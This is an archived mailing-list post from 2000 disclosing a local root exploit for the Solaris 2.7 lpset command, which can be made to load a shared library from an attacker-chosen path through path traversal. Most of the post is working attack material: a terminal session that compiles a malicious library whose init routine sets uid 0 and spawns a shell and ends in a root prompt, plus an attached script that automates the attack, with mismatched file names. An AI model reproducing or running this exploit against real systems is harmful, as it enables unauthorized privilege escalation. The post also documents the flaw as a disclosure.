Solaris/SPARC 2.7 lpset exploit (well not likely !)
Date: Thu, 27 Apr 2000 14:33:05 +0300
From: noir <[email protected]>
To: [email protected]
Subject: Solaris/SPARC 2.7 lpset exploit (well not likely !)
This is a multi-part message in MIME format.
--------------8B79FDCB8409B17A00B1CF88
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi,
lpset seems to use strcat() to pass the argument for -r flag
( /usr/lib/print/lib/../../../../tmp/foo) and appends .so to the end.
in this case /tmp/foo.so is going to be dlopen
but there is a special case /usr/lib/print/lib directory has to exist.
xploit shell script is attached.
$ uname -a
SunOS karate 5.7 Generic_106541-07 sun4u sparc SUNW,Ultra-5_10
$ id
uid=118(noir) gid=120(boha)
$ cd /tmp
$ cat > foo.c
#include <stdlib.h>
#include <unistd.h>
void
_init(void)
{
setuid(0);
system("/bin/sh");
}
^C$ /usr/local/bin/gcc -fPIC -c foo.c -g -DSOLARIS -Wall
$ ld -G -o foo.so foo.o -ldl
$ lpset -n xfn -r /../../../../tmp/foo foo
# id
uid=0(root) gid=120(boha)
#
Respect,
noir
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use
mQENAzfpmZ4AAAEIALEp8z+/6SXHZ2IYf0PQnsyCm+9hfHxlQwWQs6BI5rBQdX9J
GuSqJfGX3w+fS9xl6MWRlvno3Nmnk66QhBgs8LnunmyhtFN03TBfq7mGoBYKb79R
4jX/kjGUg9oUCr+6sqwN3bXp812qKpScxKVMvMCtQissVzDLdA01U1wCFhMg7xBQ
N9lP8tJQ1gtKUnzdsnFgsLkgT3uN+Ek7bQdmwz9a1Xqcq2jxVj5j4yEErQoY3J8m
viV+u8mr/Wo0vWEGwIeCWOKNi6SXGz69Pd9a+JRjYIBnuu33o64aEYoMGbFdslNM
KbWxsXJJAwtw4/JqKt/LosYAFreteGhdA56c7JsABRG0IE5vaXIgU2luIDxub2ly
QGdzdS5saW51eC5vcmcudHI+iQEVAwUQN+mZnnhoXQOenOybAQG16Af8Dk4ZRciA
M1Fwq/fJOQJ/kcdszFHAEVHh1nToC99b+ZeoX2I3AIzrpYl0aGZBWQeGbtG4FZuz
ldWQcvT8jsQ1M1FraAZgKIzukxAxiOJL1twlQJyEDYQ3wwyWIXXqS3c1/jl7PgC1
iv7RQXxxLRn9qFPJQcaJavxRAAVytkDQWocTguRaehtdZsjxLmH2eE7cGQe0N9aL
JJfq0XLl1NjeV5pu5oTkc90/aJ/uHxPOStmPULm5WZP6nCTaQ28lPJBaDV8pLdPo
dSg+kvlvhi+k7UgAdvsETA/I6paFyOLq8lFdORA/GHof89NQX3OyJmDGTknfKtAf
9Ky2NbzA12r6zQ==
=o1d1
-----END PGP PUBLIC KEY BLOCK-----
--------------8B79FDCB8409B17A00B1CF88
Content-Type: application/x-sh;
name="lpset.sh"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="lpset.sh"
#!/bin/sh
#
# /usr/bin/lpset vulnerability in Solaris/SPARC 2.7
# script by [email protected]
#
# lpset seems to use strcat to append paths (-r)
# but there is a special case /usr/lib/print/lib has to be present
#
cat > foo.c << EOF
#include <stdlib.h>
#include <unistd.h>
void
_init(void)
{
setuid(0);
system("/bin/sh");
}
EOF
echo "Compiling ..."
gcc -fPIC -c noir.c -g -DSOLARIS -Wall
ld -G -o noir.so noir.o -ldl
chmod 755 noir.so
rm -f noir.c
rm -f noir.o
/usr/bin/lpset -n xfn -r /../../../..$PWD/noir noir
--------------8B79FDCB8409B17A00B1CF88--
